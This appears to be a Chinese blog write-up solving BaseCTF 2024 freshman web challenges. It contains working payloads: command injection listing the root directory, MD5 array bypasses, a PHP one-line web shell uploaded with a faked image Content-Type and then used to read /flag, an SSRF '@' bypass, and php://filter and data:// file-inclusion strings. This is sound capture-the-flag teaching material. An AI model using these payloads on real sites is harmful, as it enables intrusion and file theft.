BaseCTF2024新生赛
HTTP 是什么呀
常规的GET,POST传参,改cookie,referer,UA,IP
,注意这里如果是GET传参要传入%00,就要先url
编码一次,即传入%2500,因为浏览器会自动进行一次url
解码
GET /?basectf=we1c%2500me |
base64解码即可
喵喵喵´•ﻌ•`
直接GET传参
DT=system('ls /'); |
md5绕过欸
直接数组绕过即可,注意第二层为强比较,也可用数组绕过
GET:name[]=1&name2[]=2 |
A Dark Room
源码
upload
写个一句话木马存为1.php上传,bp抓包修改文件类型为Content-Type: image/jpeg
绕过即可
eval($_POST['123']); |
蚁剑连接或者直接向/uploads/1.php传参123=system(‘cat /flag’);
Aura 酱的礼物
|
第一层直接用data伪协议读取文件为Aura,第二层参考从一文中了解SSRF的各种绕过姿势及攻击思路,通过@来隔断,将@前方当作用户名,第三层为文件包含,通过filter过滤器获得注释部分中的flag内容
pen=data://text/plain,Aura&challenge=http://jasmineaura.github.io@127.0.0.1&gift=php://filter/read=convert.base64-encode/resource=flag.php |
一起吃豆豆
直接在源码index.php中找到游戏通关后逻辑,base64解码即可
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Yxing!